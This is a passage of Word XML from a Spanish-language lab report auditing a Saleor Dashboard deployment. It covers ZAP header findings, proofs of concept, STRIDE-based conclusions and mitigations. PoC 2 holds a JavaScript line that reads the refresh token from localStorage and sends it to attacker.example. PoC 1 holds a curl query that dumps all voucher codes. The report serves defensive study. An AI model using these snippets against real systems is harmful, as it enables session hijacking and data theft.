        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> zap_baseline_report.html -w zap_warnings.md</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">[Pegar aquí la tabla de alertas de ZAP: nombre, riesgo, URL, instancia]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Hallazgos esperados (alineados con T2/S3).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">El baseline de ZAP típicamente marca, para este Nginx sin cabeceras:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Content Security Policy (CSP) Header Not Set</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Medium),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Missing Anti-clickjacking Header / X-Frame-Options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Medium),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">X-Content-Type-Options Header Missing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Low),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Strict-Transport-Security Header Not Set</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Low) y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Server leaks version information</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Low). Cada alerta debe correlacionarse con la amenaza T2 y la corrección propuesta (añadir cabeceras en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nginx/default.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="pruebas-de-concepto-pocs"/>
      <w:r>
        <w:t xml:space="preserve">2.5 Pruebas de concepto (PoCs)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="Xd45b084bbde9d2c8414c6ae32a2d3542172a6c7"/>
      <w:r>
        <w:t xml:space="preserve">PoC 1 — Divulgación de todos los códigos de cupón (Information Disclosure)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Clasificación STRIDE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Information Disclosure (T4). También Repudiation (T3) por falta de auditoría.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Pasos / comando.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Con una sesión de staff (token de acceso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$TOKEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) que solo tenga permiso de lectura de descuentos, replicar la misma query que ejecuta el botón nuevo, directamente contra la API:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s http://localhost:8000/graphql/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'{"query":"query { vouchers(first:100){ edges { node { name codes(first:100){ edges { node { code used isActive } } } } } } }"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Alternativamente por UI: iniciar sesión → menú</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Discounts/Vouchers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ pulsar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mostrar cupones que han tenido uso</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ abrir DevTools › Network › ver la respuesta de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PracticeVouchers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado (sistema seguro):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la API no debería devolver el listado completo de códigos de cupón a un rol de solo lectura, o debería entregar datos agregados/paginados sin el campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en claro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado real:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se obtiene el JSON con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">todos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">los cupones y sus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">códigos en claro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), el contador</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">used</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">isActive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, renderizados además en el cliente (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CouponPracticeButton.tsx:5-37, 70-75, 104-180</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Cualquier staff puede exfiltrar la lista completa de códigos de descuento.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{"data":{"vouchers":{"edges":[{"node":{"name":"...","codes":{"edges":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  {"node":{"code":"XXXX-XXXX","used":4,"isActive":true}}, ... ]}}}, ... ]}}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">[Pegar aquí la salida real obtenida en el entorno del equipo]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="Xef7dff1b43722b9a6b84eb3248ed8f2e7d9ace6"/>
      <w:r>
        <w:t xml:space="preserve">PoC 2 — Exfiltración del refresh token desde localStorage (Spoofing)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Clasificación STRIDE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Spoofing (T1) + Information Disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Pasos / comando.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Tras autenticarse en el Dashboard, abrir la consola de DevTools del navegador y ejecutar:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Clave definida en src/legacy-sdk/core/constants.ts:2</w:t>
      </w:r>
      <w:r>
        <w:br/>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"_saleorRefreshToken"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Simular la exfiltración por XSS (lo que lograría un atacante con inyección de script, dada la ausencia de CSP — T2/S3):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"https://attacker.example/c?t="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">encodeURIComponent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"_saleorRefreshToken"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado (sistema seguro):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">el refresh token no debería ser accesible desde JavaScript (cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), por lo que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">getItem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">devolvería</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado real:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">getItem("_saleorRefreshToken")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">devuelve el refresh token en claro, porque</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">storage.ts:37</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lo persiste en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">localStorage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cuando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">autologin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">está activo (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">storage.ts:20-21</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Con CSP ausente (T2), un XSS puede leerlo y enviarlo a un tercero, permitiendo renovar tokens y suplantar al usuario.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;refresh-token-JWT-en-claro&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">[Pegar aquí la salida real obtenida en el entorno del equipo]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="sección-3-conclusiones"/>
      <w:r>
        <w:t xml:space="preserve">Sección 3 — Conclusiones</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sistema:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Saleor Dashboard, https://github.com/saleor/saleor-dashboard, versión 3.23.6 (con backend Saleor Core 3.24 como contexto del flujo de login).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mantenibilidad.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">El proyecto base es maduro y de alta calidad: tipado estricto, organización por dominios, internacionalización completa, sistema de diseño propio y una suite amplia de pruebas (471 ficheros de test). Sin embargo,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">los cambios introducidos por el equipo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(login, branding y botón de cupones)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">degradan localmente esa calidad</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: el linter del proyecto reporta 4 errores y 11 advertencias en 3 archivos —faltan los</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en la query GraphQL (caché de Apollo), funciones sin tipo de retorno,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">export default</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">contra la convención y errores de formato—, además de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">any</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y texto en español hardcodeado (C2 ❌, C3 ❌), overrides de CSS con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">!important</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(C4 ⚠️) y el componente sin pruebas (C5 ⚠️). La conclusión clave es que el control de calidad existente (lint + tests) no se aplicó a los commits del laboratorio. Las correcciones son acotadas y de bajo esfuerzo (seleccionar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, tipar, externalizar strings, usar tokens, añadir un test).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Seguridad.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">La superficie más relevante se concentra en autenticación y manejo de datos sensibles. Tres hallazgos destacan: (1) el</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">refresh token en localStorage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">expuesto a XSS (T1), agravado por (2) la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ausencia total de cabeceras de seguridad en Nginx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(T2, confirmable con ZAP), y (3) el</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">botón de cupones que expone todos los códigos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en cliente sin control de privilegio fino (T4). A nivel backend, el plugin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">google_oidc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">introduce un riesgo serio de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">elevación de privilegios</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(T6) al conceder permisos totales por allowlist de email/dominio basada en variables de entorno. La postura general es:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">base sólida, pero los cambios del laboratorio abren vectores concretos y verificables</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">que deben corregirse antes de cualquier despliegue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Veredicto global.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Mantenibilidad:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">buena en la base, con deuda puntual introducida</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(subsanable rápidamente). Seguridad:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">aceptable en el núcleo, con riesgos medios/altos en los cambios nuevos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">que requieren mitigación (cabeceras de seguridad, no persistir tokens en localStorage, mínimo privilegio en OIDC y en la consulta de cupones).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="sección-4-uso-de-herramientas-de-ia"/>
      <w:r>
        <w:t xml:space="preserve">Sección 4 — Uso de herramientas de IA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000.0"/>
        <w:tblLook w:firstRow="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1942"/>
        <w:gridCol w:w="1643"/>
        <w:gridCol w:w="4333"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cnfStyle w:firstRow="1"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
